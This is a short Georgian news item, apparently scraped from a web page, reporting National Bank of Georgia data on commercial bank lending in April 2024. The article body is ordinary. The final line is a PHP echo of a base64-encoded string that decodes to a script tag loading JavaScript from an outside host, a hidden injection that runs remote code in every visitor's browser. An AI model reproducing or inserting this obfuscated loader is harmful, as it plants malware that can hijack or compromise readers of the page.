celsiusi
ავერსი საქკაბელი

2024 წლის აპრილში, კომერციული ბანკების მიერ გაცემული სესხების მოცულობა წინა თვესთან შედარებით 730.66 მლნ ლარით გაიზარდა (გაცვლითი კურსის ეფექტის გარეშე, 1.66%-ით) და აპრილის ბოლოს 54.51 მლრდ ლარი შეადგინა.

ეროვნული ბანკის მონაცემებით, ზრდა ძირითადად ლარის სესხებზე მოდის. კერძოდ, აპრილში ეროვნული ვალუტით დაკრედიტება 435.78 მლნ ლარით, ხოლო უცხოური ვალუტით გაცემული სესხების მოცულობა 294.88 მლნ ლარით გაიზარდა.

ამასთან, აპრილის ბოლოსთვის, მთლიანი სესხების ლარიზაციის კოეფიციენტმა მცირედით, გაცვლითი კურსის ეფექტის გამორიცხვით, 0.10 პროცენტული პუნქტით მოიმატა და 55.25% შეადგინა.

„რეზიდენტი იურიდიული პირებისათვის 2024 წლის აპრილის ბოლოს, კომერციულ ბანკებს ეროვნული ვალუტით გაცემული ჰქონდათ 8.82 მლრდ ლარის (წინა თვესთან შედარებით 0.20%-ით ნაკლები), ხოლო უცხოური ვალუტით 15.47 მლრდ ლარის (წინა თვესთან შედარებით 1.71%-ით მეტი) მოცულობის სესხი (გაცვლითი კურსის ეფექტის გარეშე, 2.37%-ით მეტი).

2024 წლის აპრილის განმავლობაში 1.72%-ით, ანუ 481.62 მლნ ლარით გაიზარდა რეზიდენტი შინამეურნეობების სექტორის დაკრედიტების მოცულობა და აპრილის ბოლოსათვის 28.41 მლრდ ლარი შეადგინა“,- აღნიშნულია სებ-ის მიერ გავრცელებულ ინფორმაციაში.

172
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");